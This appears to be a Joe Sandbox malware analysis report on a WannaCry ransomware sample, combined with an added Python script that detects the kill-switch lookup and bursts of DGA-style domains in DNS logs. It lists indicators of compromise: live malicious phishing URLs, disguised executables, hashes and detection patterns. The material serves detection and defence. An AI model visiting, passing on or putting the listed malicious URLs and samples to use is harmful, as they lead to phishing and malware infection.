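    r"2022-07-23T01:44:02Z host=WS01 image=C:\Windows\mssecsvc.exe query=tvmwem.com result=NXDOMAIN",
    r"2022-07-23T01:44:02Z host=WS01 image=C:\Windows\mssecsvc.exe query=phirwq.com result=NXDOMAIN",
    r"2022-07-23T01:44:03Z host=WS01 image=C:\Windows\mssecsvc.exe query=liamse.com result=NXDOMAIN",
    r"2022-07-23T01:44:03Z host=WS01 image=C:\Windows\mssecsvc.exe query=otoagh.com result=NXDOMAIN",
    r"2022-07-23T01:44:04Z host=WS01 image=C:\Windows\mssecsvc.exe query=quydys.com result=NXDOMAIN",
    r"2022-07-23T01:44:04Z host=WS01 image=C:\Windows\mssecsvc.exe query=xyzrpb.com result=NXDOMAIN",
    r"2022-07-23T01:44:04Z host=WS01 image=C:\Windows\mssecsvc.exe query=xyzrpb.com result=NXDOMAIN",  # retry, counted once
    r"2022-07-23T01:44:05Z host=WS01 image=C:\Windows\System32\svchost.exe query=activity.windows.com result=192.0.2.10",
    r"2022-07-23T01:44:06Z host=WS02 image=C:\Windows\explorer.exe query=gogle.com result=NXDOMAIN",  # typo, not a burst
    r"2022-07-23T01:44:06Z host=WS02 image=C:\Windows\explorer.exe query=www.google.com result=192.0.2.20",
]

if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, hit)
```

On the constructed log the kill-switch check returns the single mssecsvc.exe lookup and the burst check returns one alert for WS01/mssecsvc.exe (6 distinct failed names out of 7 queried, ratio 0.86); the svchost.exe and explorer.exe lookups stay quiet because a single NXDOMAIN for a typo neither matches the name shape nor reaches the count threshold. Distinct names are counted rather than raw events so a resolver retry storm does not inflate the score.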
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 672008
Start date and time: 2022-07-23 01:43:07 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 39s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: y2jb4FtSNq (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 18
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winDLL@29/11@24/3
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 39.6% (good quality ratio 36%)
• Quality average: 77.2%
• Quality standard deviation: 32.3%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 17
• Number of non-executed functions: 84
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 23.211.4.86, 20.82.210.154, 20.82.209.183
                                                                                                                              • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, rjirxk.com, fs-wildcard.microsoft.com.edgekey.net, wufhfo.com, cudiqm.com, veqbbn.com, www.bing.com, wnzgoe.com, smezbn.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, wlnmvm.com, bnwzie.com, uaqjzn.com, eymtmi.com, mbxpjh.com, btkcso.com, ris.api.iris.microsoft.com, pangeq.com, qmimjr.com, olieyo.com, aoulrr.com, vgemhe.com, uatacq.com, eeauou.com, aaeyfv.com, pnuoyg.com, iireby.com, e12564.dspb.akamaiedge.net, go.microsoft.com, qtnarp.com, fudevu.com, qmehuz.com, cixudc.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, exevye.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ant.trenz.pl, iooaeg.com, lcogil.com, pxunuy.com, lugaup.com, youdqa.com, rffriz.com, boziev.com, seyuei.com, cerbyj.com, zyjedf.com, niongj.com, ahanjw.com, login.live.com, atvhio.com, watson.telemetry.microsoft.com, kuwazq.com, uyjpue.com, fs.microsoft.com, chlntf.com, clpivo.com, jiarfr.com, vwfgt
                                                                                                                              • Execution Graph export aborted for target tasksche.exe, PID 3780 because there are no executed function
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
01:44:19 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
01:44:47 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match: 104.16.173.80 (contacted IP)
Associated Sample Name / URL | Detection | Context (domain contacted by that sample)
KzTwbZkCyW.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
mAgMRXeHnV.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
u25HmIWOKl.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
JnqM1TFtYi.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
5hHHsExlwx.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
XHlAv3DhlB.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
VzAh2pC8hQ.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
MSmReFKunQ.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
bdXynoRgnV.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
NXE94LoM7v.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
p2zzIwIYiq.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Liw5SS6our.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
kvkcvyw5oX.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
hkOMcMvb1g.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
pVq0MV4s45.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
uQfVWYzSkC.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
oEPKuvzhOV.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
TigrxMihsc.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
ldmAEqI3Cz.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
7qaVQr9tBi.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Match: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com (contacted domain)
Associated Sample Name / URL | Detection | Context (IP the domain resolved to in that analysis)
HhDMZKWBi5.dll | malicious | 104.17.244.81
KzTwbZkCyW.dll | malicious | 104.17.244.81
mAgMRXeHnV.dll | malicious | 104.17.244.81
giXSx7co4Z.dll | malicious | 104.17.244.81
u25HmIWOKl.dll | malicious | 104.17.244.81
JnqM1TFtYi.dll | malicious | 104.16.173.80
7Qu8thR7WW.dll | malicious | 104.17.244.81
Kq8sxCCgnb.dll | malicious | 104.17.244.81
5hHHsExlwx.dll | malicious | 104.17.244.81
XHlAv3DhlB.dll | malicious | 104.16.173.80
IlpKomTIie.dll | malicious | 104.17.244.81
VzAh2pC8hQ.dll | malicious | 104.16.173.80
MSmReFKunQ.dll | malicious | 104.16.173.80
bdXynoRgnV.dll | malicious | 104.16.173.80
NXE94LoM7v.dll | malicious | 104.16.173.80
p2zzIwIYiq.dll | malicious | 104.16.173.80
Z5aCnP2H7Z.dll | malicious | 104.17.244.81
Liw5SS6our.dll | malicious | 104.16.173.80
kvkcvyw5oX.dll | malicious | 104.17.244.81
dlMW8hjgjP.dll | malicious | 104.17.244.81
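Two network behaviours in this report are worth turning into DNS-log detections: the lookup of the WannaCry kill-switch domain listed in the context table above (which resolved to the Cloudflare addresses 104.16.173.80 and 104.17.244.81 across every associated sample), and the burst of six-letter .com names that the cookbook comment shows were excluded from analysis as whitelisted (rjirxk.com, wufhfo.com, cudiqm.com and the rest). The script below is an added example written for this page, not code from Joe Sandbox or from the report; the log lines are constructed, the address pairings for the benign names are illustrative rather than real resolutions, the six-letter .com pattern is a heuristic derived only from the names on this page, and the allowlist suffixes are an assumption.

```python
"""DNS-log triage for the two network behaviours this report records:
the WannaCry kill-switch lookup and bursts of short pseudo-random .com names."""
import json
import re

# From the report: the kill-switch domain and the Cloudflare addresses it resolved to.
KILL_SWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
SINKHOLE_IPS = {"104.16.173.80", "104.17.244.81"}

# Heuristic (assumption, derived from the names in the report's excluded-domain list):
# the DGA family seen here emits exactly six lowercase letters directly under .com.
DGA_PATTERN = re.compile(r"^[a-z]{6}\.com$")

# Infrastructure a proxy or sandbox would normally whitelist (assumed allowlist).
KNOWN_GOOD_SUFFIXES = (
    ".microsoft.com", ".live.com", ".bing.com", ".edgekey.net",
    ".akadns.net", ".akamaiedge.net", ".trafficmanager.net", ".cloudapp.azure.com",
)

# Constructed log (not from the report). Format: "<time> <client> <qname> <answer|NXDOMAIN>".
# The benign names are paired with addresses the report whitelisted; those pairings are
# illustrative, not real resolutions.
SAMPLE_DNS_LOG = """\
01:44:20 10.0.0.5 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.16.173.80
01:44:21 10.0.0.5 rjirxk.com NXDOMAIN
01:44:21 10.0.0.5 wufhfo.com NXDOMAIN
01:44:22 10.0.0.5 cudiqm.com NXDOMAIN
01:44:22 10.0.0.5 login.live.com 20.40.136.238
01:44:23 10.0.0.5 fs.microsoft.com 23.211.6.115
01:44:30 10.0.0.9 www.bing.com 20.82.210.154
01:44:31 10.0.0.9 go.microsoft.com 23.211.4.86
"""


def parse_dns_log(text):
    """Parse whitespace-separated log lines into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, answer = parts
        records.append({"ts": ts, "client": client,
                        "qname": qname.lower().rstrip("."), "answer": answer})
    return records


def is_known_good(qname):
    """Allowlist check on domain suffixes; the bare registrable names count as well."""
    bare = {s.lstrip(".") for s in KNOWN_GOOD_SUFFIXES}
    return qname.endswith(KNOWN_GOOD_SUFFIXES) or qname in bare


def is_dga_candidate(qname):
    """True for names matching the six-letter .com pattern that are not allowlisted."""
    return bool(DGA_PATTERN.match(qname)) and not is_known_good(qname)


def triage(records, min_dga_queries=3):
    """Group records per client and report kill-switch and DGA findings.

    dga_alert fires only once a client has queried at least min_dga_queries distinct
    candidate names, so a single odd-looking lookup does not page anyone.
    """
    by_client = {}
    for rec in records:
        by_client.setdefault(rec["client"], []).append(rec)

    findings = {}
    for client, recs in by_client.items():
        ks_hits = [r for r in recs if r["qname"] == KILL_SWITCH_DOMAIN]
        dga = [r for r in recs if is_dga_candidate(r["qname"])]
        distinct_dga = sorted({r["qname"] for r in dga})
        findings[client] = {
            "kill_switch_queried": bool(ks_hits),
            # Any non-NXDOMAIN answer means the sinkhole was reachable from this client.
            "kill_switch_resolved": any(r["answer"] != "NXDOMAIN" for r in ks_hits),
            "kill_switch_known_sinkhole": any(r["answer"] in SINKHOLE_IPS for r in ks_hits),
            "dga_candidates": distinct_dga,
            "dga_nxdomain": sum(1 for r in dga if r["answer"] == "NXDOMAIN"),
            "dga_alert": len(distinct_dga) >= min_dga_queries,
        }
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(parse_dns_log(SAMPLE_DNS_LOG)), indent=2))
```

Two caveats when reading the output. A resolved kill-switch lookup is not good news: it shows WannaCry code ran on that host and reached the sinkhole, and only the original worm honours the check, so treat the query itself as the indicator. And the sandbox's whitelist dropped the six-letter names from this analysis; in a production resolver log the same names, especially when most of them return NXDOMAIN, are the signal, which is why the threshold counts distinct candidates rather than trusting any one of them.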
Match: CLOUDFLARENETUS (ASN)
Associated Sample Name / URL | Detection | Context (IP in this ASN contacted by that sample)
zePuRkS1Xn.dll | malicious | 172.67.34.170
https://houseinspector.8b.io | malicious | 104.18.11.207
http://trk.klclick3.com/ls/click?upn=Ji4TiwFf9C8KZa7AUkLef4lH8yUzvhj-2FN28bg-2FRjY-2FdygBYb-2FMR9VWVahh6stwCB6PdVy1ZaS5mv8zdj3dphabFYR7M365jBDN-2BStcnq9DNnyMS3z1LhYOJI-2BVhJyeKkEtGy6u3HGx0Z2G-2Fw7TkbmkXlQcEINe4XcrX9-2FPXFTQcp7X3qwNeJTLVwl4vlxX3e7u3WOc9yRUy0-2F8ieVVTK-2B7D2-2BPiYlNMQ10AFH8pSh26-2BzF-2BMmdav5o4YHt44f-2By3NIVcKzAtKyGNuqRldj3AzA-3D-3DT-ik_ljzEBGrrK0qZqc4J-2BeoFliRHcBhjtmZA1jHS-2Bpcs9rPq7kOK-2FC-2FRcIzt-2Fdhhb-2F6rep3-2F1jF3L6QMr2JXq2mz5-2F4ZqpfkPgBAS8rAvSsWJqfl1UiIPy3SqagA6su-2FFukL3dSsymQnSOQpXet3hnjJf91E-2FvK-2BmMVzbgBFMj2KVh16nCEmG6Y2iUBcE-2B-2BuiA2OxEBRdDht03JFiKIDzrqM3AvTNB5wWjQ4KlCuclj5pmNJjP13zdYgU5EA6haENsH14wheWPrsFvx1c0zpqezW3zfvP8Safnmk-2FiDrCcNdgxhD49x-2FSxWRJPhUl6sBq2TRZs7eyQ8sdlJZXPt1TUB8wWc0AgsoHvVx0sdbzCGKaxqByHoB6Il5o-2Fnoyr757znlPs7ug-2BMHKVJPWuJbyLEk5A-3D-3D | malicious | 104.17.24.14
hesaphareketi-01.exe | malicious | 104.18.115.97
Info-Relev#U00e9-fiscal.vbs | malicious | 104.18.28.213
Info-Releve-fiscal.vbs | malicious | 104.18.28.213
Scan Document.PDF.exe | malicious | 162.159.129.233
Rooming list Associados Grupo Nacionalinn.pdf.bat | malicious | 172.66.40.175
f.bat | malicious | 104.16.148.64
treyner-dlya-x-com-u_Jp2al5dm.exe | malicious | 188.114.97.3
HhDMZKWBi5.dll | malicious | 104.17.244.81
treyner-dlya-x-com-u_Jp2al5dm.exe | malicious | 188.114.96.3
https://insightsitcdelivery.com/knowbe4-9665-64068/unsubscribe/LDZP83cKArYqcCmP4whZcyX4LUTd | malicious | 104.17.25.14
https://insightsitcdelivery.com/knowbe4-9665-64068/56742?uid=LDZP83cKArYqcCmP4whZcyX4LUTd&prom_type=regular&prom_id=181750&pld=26L81sNgpwNGbf | malicious | 104.26.10.16
http://bikehike.org | malicious | 104.18.3.114
https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Flinkprotect.cudasvc.com%2Furl%3Fa%3Dhttps%253a%252f%252fapp.box.com%252fs%252fo29wsp0z3edbibb2pphpqfx7nb5m2yx7%26c%3DE,1,cyBXh8kJkb3lnygeGJ58e4w29wV7FH_a0ltZH1VwoGOSRLdWvQLHUv7qcxtM6n7vFB5nyUv1A-P8jmWzAzFPg49JHwbBUVwAhqjjw3azwXM,%26typo%3D1&E=mobilebanking%40woodlandsbank.com&X=XID687AgsPUp2755Xd3&T=WDLP&HV=U,E,X,T&H=3827417279ae1b70fc9534216b552819c3b7a8ca | malicious | 104.18.11.207
KzTwbZkCyW.dll | malicious | 104.17.244.81
https://kalinvites.com/invitations/private/60lRnfdQf5A/z_gsPCHvE-Y?pos=link | malicious | 104.18.37.246
http://mids4d.co.uk | malicious | 104.16.148.64
https://locksmithelpasotexas.com/wp-content/plugins/mqdrxkc/2Factor.html#YnJpYW4ud2lsbGlhbXNAa3JhZnRtYWlkLmNvbQ==&target=_blank | malicious | 104.21.84.241
                                                                                                                              https://locksmithelpasotexas.com/wp-content/plugins/mqdrxkc/2Factor.html#YnJpYW4ud2lsbGlhbXNAa3JhZnRtYWlkLmNvbQ==&target=_blankGet hashmaliciousBrowse
                                                                                                                              • 104.21.84.241
                                                                                                                              No context
                                                                                                                              Match: C:\Windows\tasksche.exe
                                                                                                                              Associated Sample Name / URL (Detection: malicious): 7B6t4L7E2o.dll, 4GDffePnzH.dll, HFKDS6VcNO.dll, FjYNZSPNkt.dll, kBBdc7Aoj4.dll, tct5NKwZY8.dll, 7KPQg3aXdC.dll, ngFFOGiE7Y.dll
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8192
                                                                                                                                              Entropy (8bit):0.3593198815979092
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                              MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                              SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                              SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                              SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                              Malicious:false
                                                                                                                              Preview: (binary data, mostly null bytes; the only readable string is C:\ProgramData\Microsoft\Network\Downloader\, which appears twice)
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:MPEG-4 LOAS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.24945325358406642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4hdm:BJiRdwfu2SRU4hdm
                                                                                                                                              MD5:17B3A2BF09EDB31C2D25BC8F7A27AFB2
                                                                                                                                              SHA1:24E89A876E93B3A9996890D456865BABF10CB574
                                                                                                                                              SHA-256:FDEEADF1F6724F3D657FF3670521EEEB86E5096E16D90DAA8E458CF5434C834C
                                                                                                                                              SHA-512:6AE93B0F7536C7437BE4B6D41AC8C983FC21D7D34BD3585020C1A20F0FC69C4705BC374DDAFDBA1E60B3CE8F966F6278E878509591EAC589A38F5F848DFF17B8
                                                                                                                                              Malicious:false
                                                                                                                              Preview: (binary data, mostly null bytes; the only readable string is C:\ProgramData\Microsoft\Network\Downloader\, which appears twice)
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdd0e993c, page size 16384, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):786432
                                                                                                                                              Entropy (8bit):0.2507045304539694
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:dLG+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:dLpSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                              MD5:DF0411E97ED961C261CAD11CCB2EFF3A
                                                                                                                                              SHA1:56DD03A42715C758957022BAA66DFA5209BD2758
                                                                                                                                              SHA-256:BAEB4116358571C5CA4637DED560AC60937ADD48966435952CA0CC37E026E725
                                                                                                                                              SHA-512:9B106A288841C6DFA919638810CE0FAD48ADEC1E43DE7FD014DA3646406B3DE9B28A6EF841A896F03B95951B64BB233CDB81774A1887D16B81935B874684168B
                                                                                                                                              Malicious:false
                                                                                                                              Preview: (binary data, mostly null bytes; no readable strings)
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.0770467428783165
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:XD7vVOiOEtyilbMqnHtxlll3Vkttlmlnl:zrbtxl7Hf3
                                                                                                                                              MD5:9A440ADD24A8174BAD1B8053A0CDF426
                                                                                                                                              SHA1:B6C2D6268EC348E512CEFC23DC7312EE8483CDB1
                                                                                                                                              SHA-256:5AB255A3ED2EFCA55B5BA8946E0F8B34D389669023017DC16F10F9D67346FEB2
                                                                                                                                              SHA-512:19A8DEA83E0A51B581FB1723354385EF2CEE746D188DEA3172FA459E9030C8F52825B9B2B3C33F8AA13E9CA40BAEEFC35698CAB2315DEE6D9729A62EDC6AC0C0
                                                                                                                                              Malicious:false
                                                                                                                              Preview: (binary data, mostly null bytes; no readable strings)
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6094
                                                                                                                                              Entropy (8bit):3.832911797157349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyggwUwTBwk4brj6XgUwTBNYDBUs8k0s7MRFnwFDBc:Lv44wFyg8wTt4XmXhwT1s8k0pRK5G
                                                                                                                                              MD5:8D14E457703F2D6A144D6883BAAF9C42
                                                                                                                                              SHA1:783F38A8D699D64341A96261ABBADFCB16DEC793
                                                                                                                                              SHA-256:09A6C39985AB7184CCF41746CBE4ED4B99F035C6C5DCF597C40CEDD5BA4F914C
                                                                                                                                              SHA-512:DF5395ADC8A53CBEFC25F0BB9271056D5F11903EF5EE39467E643A5E5336142E9B0D77EA902570C9CDB7B75D895E73A85C49C2677CB2012539D7435B427B4910
                                                                                                                                              Malicious:false
                                                                                                                              Preview (UTF-16 decoded; truncated as in the report): {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properties\":{\"noOp\":{\"event\":\"none\",\"parameters\":{},\"action\":\"noOp\"}},\"tracking\":{\"events\":[{\"id\":\"impression\"}],\"parameterized\":[{\"uri\":\"https:\/\/ris.api.iris.microsoft.com\/v1\/a\/{ACTION}?CID=128000000001627409&region=US&l
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6094
                                                                                                                                              Entropy (8bit):3.832911797157349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyggwUwTBwk4brj6XgUwTBNYDBUs8k0s7MRFnwFDBc:Lv44wFyg8wTt4XmXhwT1s8k0pRK5G
                                                                                                                                              MD5:8D14E457703F2D6A144D6883BAAF9C42
                                                                                                                                              SHA1:783F38A8D699D64341A96261ABBADFCB16DEC793
                                                                                                                                              SHA-256:09A6C39985AB7184CCF41746CBE4ED4B99F035C6C5DCF597C40CEDD5BA4F914C
                                                                                                                                              SHA-512:DF5395ADC8A53CBEFC25F0BB9271056D5F11903EF5EE39467E643A5E5336142E9B0D77EA902570C9CDB7B75D895E73A85C49C2677CB2012539D7435B427B4910
                                                                                                                                              Malicious:false
                                                                                                                              Preview (UTF-16 decoded; truncated as in the report): {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properties\":{\"noOp\":{\"event\":\"none\",\"parameters\":{},\"action\":\"noOp\"}},\"tracking\":{\"events\":[{\"id\":\"impression\"}],\"parameterized\":[{\"uri\":\"https:\/\/ris.api.iris.microsoft.com\/v1\/a\/{ACTION}?CID=128000000001627409&region=US&l
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6090
                                                                                                                                              Entropy (8bit):3.8377386003114715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyEUIXUwTk4brjXUzrkUQUwOI1kBUM8k0s7MRhwFDBc:Lv44wFyEjkwA4XDIrkqwlM8k0pRW5G
                                                                                                                                              MD5:BFDECB77885429E9C67C10DE3557D13D
                                                                                                                                              SHA1:5CD3D93F47D7A50C7910DD7D032756320E069129
                                                                                                                                              SHA-256:849C9385B3860B9C6DF193EFCBFFD3793986677A4FB00B69ABE000E0F58F116A
                                                                                                                                              SHA-512:8921CC70210D552B211FC48F97EFA8A98967610384C5C5F1BB75B28BC0277D993296D8CC3E288290EC3C2FE5F6066FA3D2CAFB27571A1F36E29E94C024CD17A3
                                                                                                                                              Malicious:false
                                                                                                                              Preview (UTF-16 decoded; truncated as in the report): {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properties\":{\"noOp\":{\"event\":\"none\",\"parameters\":{},\"action\":\"noOp\"}},\"tracking\":{\"events\":[{\"id\":\"impression\"}],\"parameterized\":[{\"uri\":\"https:\/\/ris.api.iris.microsoft.com\/v1\/a\/{ACTION}?CID=128000000001627409&region=US&l
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6090
                                                                                                                                              Entropy (8bit):3.8377386003114715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyEUIXUwTk4brjXUzrkUQUwOI1kBUM8k0s7MRhwFDBc:Lv44wFyEjkwA4XDIrkqwlM8k0pRW5G
                                                                                                                                              MD5:BFDECB77885429E9C67C10DE3557D13D
                                                                                                                                              SHA1:5CD3D93F47D7A50C7910DD7D032756320E069129
                                                                                                                                              SHA-256:849C9385B3860B9C6DF193EFCBFFD3793986677A4FB00B69ABE000E0F58F116A
                                                                                                                                              SHA-512:8921CC70210D552B211FC48F97EFA8A98967610384C5C5F1BB75B28BC0277D993296D8CC3E288290EC3C2FE5F6066FA3D2CAFB27571A1F36E29E94C024CD17A3
                                                                                                                                              Malicious:false
                                                                                                                              Preview (UTF-16 decoded; truncated as in the report): {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properties\":{\"noOp\":{\"event\":\"none\",\"parameters\":{},\"action\":\"noOp\"}},\"tracking\":{\"events\":[{\"id\":\"impression\"}],\"parameterized\":[{\"uri\":\"https:\/\/ris.api.iris.microsoft.com\/v1\/a\/{ACTION}?CID=128000000001627409&region=US&l
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3751936
Entropy (8bit):6.540577440579626
Encrypted:false
SSDEEP:49152:TnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:zDqPoBhz1aRxcSUDk36SA
MD5:B0F06045E4D3E693094C54C315A5B632
SHA1:79AC0293A7343DE40831B2F141E7E73FA20E6D72
SHA-256:1672B56A8E29207AC942E894A080832C2E162044B62E439CBEA37347B4AEA004
SHA-512:F186DBB625437CB0E6DBEB07B7122A7C43296A2C8CA076A49219A04EDD8D4237D35F14A4DA094348825B540B9FF08120730D899A345AD509C67E70D0A1502FCA
Malicious:true
Yara Hits:
• Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
• Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
